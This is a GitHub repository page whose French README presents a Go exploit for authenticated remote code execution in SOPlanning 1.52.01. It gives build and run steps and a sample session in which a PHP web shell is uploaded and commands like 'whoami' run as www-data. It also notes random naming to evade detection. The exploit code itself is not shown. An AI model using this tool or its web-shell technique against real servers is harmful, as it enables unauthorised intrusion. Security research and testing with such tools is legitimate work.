https://github.com/minatsukix86/rce-soplanning-1.52.01
https://github.com/minatsukix86/rce-soplanning-1.52.01
Last synced: about 2 months ago
JSON representation
- Host: GitHub
- URL: https://github.com/minatsukix86/rce-soplanning-1.52.01
- Owner: minatsukix86
- Created: 2024-11-28T20:42:22.000Z (6 months ago)
- Default Branch: main
- Last Pushed: 2024-11-28T20:51:57.000Z (6 months ago)
- Last Synced: 2025-02-01T10:26:33.247Z (4 months ago)
- Language: Go
- Size: 6.84 KB
- Stars: 1
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# SOPlanning 1.52.01 - Remote Code Execution (Authenticated)
## Description
Ce projet est un exploit en Go qui cible une vulnérabilité de type *Remote Code Execution (RCE)* authentifiée dans SOPlanning version 1.52.01. Cette vulnérabilité permet à un attaquant disposant d'identifiants valides d'exécuter des commandes arbitraires sur le serveur via l'upload d'un shell PHP.
## Fonctionnalités
- Exploitation de la vulnérabilité RCE via l'upload d'un fichier malveillant.
- Shell interactif pour l'exécution de commandes sur le serveur cible.
- Génération aléatoire des noms de fichiers et identifiants pour éviter la détection.## Prérequis
- Langage Go installé ([Go](https://golang.org/dl/)).
- Accès au serveur SOPlanning version 1.52.01 avec des identifiants valides.## Installation
1. Clonez le dépôt ou copiez le code source dans un fichier Go.
2. Compilez le code source avec Go :
```bash
go build soplanning_rce.go
```## Utilisation
1. Exécutez l'exploit avec la commande suivante :
```bash
./soplanning_rce
```
2. Entrez les informations nécessaires :
- **URL de la cible** : L'adresse du serveur SOPlanning (par exemple, `http://localhost/soplanning`).
- **Nom d'utilisateur** : Identifiant d'un utilisateur authentifié.
- **Mot de passe** : Mot de passe de l'utilisateur.3. Si l'exploit réussit, une URL vers le shell web est générée. Vous pouvez exécuter des commandes via cette URL ou utiliser le shell interactif intégré.
## Exemple de Session
```plaintext
Target URL (e.g., http://localhost:8080): http://localhost/soplanning
Username: admin
Password: admin123[+] Uploaded ==> 200 OK
[+] Exploit completed.
Access webshell here: http://localhost/soplanning/upload/files/abc123/xyz.php?cmd=
Do you want an interactive shell? (yes/no): yes
soplaning:~$ whoami
www-data
soplaning:~$ pwd
/var/www/html/soplanning/upload/files/abc123
```## Avertissement
Ce script est fourni à des fins éducatives et de tests de sécurité uniquement. L'utilisation non autorisée de cet outil pour accéder à des systèmes sans consentement explicite est illégale et peut entraîner des sanctions sévères. L'auteur décline toute responsabilité en cas d'utilisation abusive.